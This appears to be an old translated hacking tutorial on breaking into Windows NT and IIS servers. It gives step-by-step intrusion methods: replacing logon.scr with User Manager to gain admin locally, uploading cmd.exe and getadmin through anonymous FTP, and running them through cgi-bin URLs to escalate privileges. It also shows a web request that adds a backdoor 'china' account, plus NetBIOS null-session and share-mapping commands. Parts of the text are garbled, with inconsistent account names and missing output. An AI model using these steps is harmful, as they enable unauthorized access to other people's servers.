If you have an ordinary user account, there is a very simple method to get the NT Administrator account:
One: first, in c:\winnt\system32, rename logon.scr to logon.old as a backup. Then put in usrmgr.exe renamed to logon.scr.
logon.scr is the program loaded at startup; after the reboot, the login password input interface does not appear, but the User Manager does.
In this case it has permission to add yourself to the Administrators group.
Don't forget to change the file name back!
Two: The following technique applies to sites that do not pay attention to NT network security; some of the HTTP techniques can also serve as a reference for more advanced people.
Getting into an NT network can take the following steps:
Because NT IIS servers generally allow anonymous login to FTP, and some anonymous accounts also have upload permission, this is what we use against the site. If the anonymous account were not allowed, passwords would be transmitted in plaintext over the network, and tools such as tcpspy can intercept these passwords; we will not talk about these more advanced techniques now. Allowing anonymous FTP login also gives us an opportunity to break into the NT server. We use FTP to log in to an NT server, for example www.xxx.com (an example name):
Connected to www.xxx.com
ntsvr2 here exposes its NetBIOS name, so in the IIS background there must be a user account IUSER_ntsvr2 belonging to the Domain Users group; this account is what we later use to obtain Administrator privileges. User (www.xxx.com:(none)): anonymous
Password: enter guest@ or guest
Because administrators lack network security knowledge, many do not disable the guest account, or do not set a password for it. Then the guest account is one with a valid user account, although it only belongs to the Domain Guests group.
In this case we can get into the NT server's FTP.
Once in, look at the directory listing and try cd /c or wwwroot and other key directories; if you are lucky and change directory successfully, then you have an 80% chance.
Now start looking for the cgi-bin directory (or scripts directory); once in,
copy cmd.exe from under winnt to cgi-bin, and upload getadmin and gasys.dll to cgi-bin.
Then input: http://www.xxx.com/cgi-bin/getadmin.exe?IUSR_SATURN
About ten seconds later the screen displays:
In this case there is a 90% chance that you have upgraded IUSER_ntsvr2 to Administrator, that is, anyone accessing the web site is the administrator.
Here you can add user:
http://www.xxx.com/cgi-bin/cmd.exe?/c c:\winnt\system32\net.exe user china news /add
This will create a user china with password news, then:
You then log in with the china account, and you may have the greatest privileges. You can also use the cmd.exe method above to make changes directly; if there is no cmd.exe, you can also upload one to the scripts/tools or cgi-bin directory.
Three: Scanning with NT's NetBIOS technology
This way you can get the shared resource names of the domain:
net view \\www.xxx.com\
You can get the machine's shared resource names; if there is a C drive:
net use f: \\www.xxx.com\c
You can map its C drive as f:
net use \\126.96.36.199\ipc$ "" /user:""
Four: Tools ported from Unix: Windows 95/98 users can use the following TCP/IP tools to capture packets on a TCP/IP connection:
WinDump95.exe; before using it, also download the library Packet95.exe
Windows NT user version